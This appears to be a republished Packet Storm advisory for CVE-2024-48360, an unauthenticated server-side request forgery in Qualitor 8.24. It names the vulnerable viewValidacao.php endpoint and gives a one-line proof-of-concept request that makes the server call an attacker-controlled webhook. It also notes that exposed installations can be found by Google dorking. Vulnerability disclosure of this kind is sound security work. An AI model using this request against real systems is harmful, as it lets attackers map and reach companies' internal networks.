Qualitor 8.24 Server-Side Request Forgery
2024-10-31 22:13:13 Author: packetstormsecurity.com(查看原文) 阅读量:2 收藏

# CVE-2024-48360 | Qualitor <= v8.24 Unauthenticated SSRF

## Description

Qualitor is a platform for business process management, and this system is present in various companies in Brazil that can be identified simply by using Google dorking.

Our team identified a vulnerability in the application susceptible to SSRF, which allows enumerate internal systems/ports.

## Proof of Concept (POC)

Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /request/viewValidacao.php.

To exploit, just send a request to host.com/html/ad/adformmobile/request/viewValidacao.php?url=ATTACKER_WEBHOOK, you will receive the request from vulnerable server.

![image](https://github.com/user-attachments/assets/c7f3dd6f-759d-430c-a135-fdc01e802619)

### Researches

https://www.linkedin.com/in/xvinicius/

- OpenXP Research Team


文章来源: https://packetstormsecurity.com/files/182427/qualitor824-ssrf.txt
如有侵权请联系:admin#unsafe.sh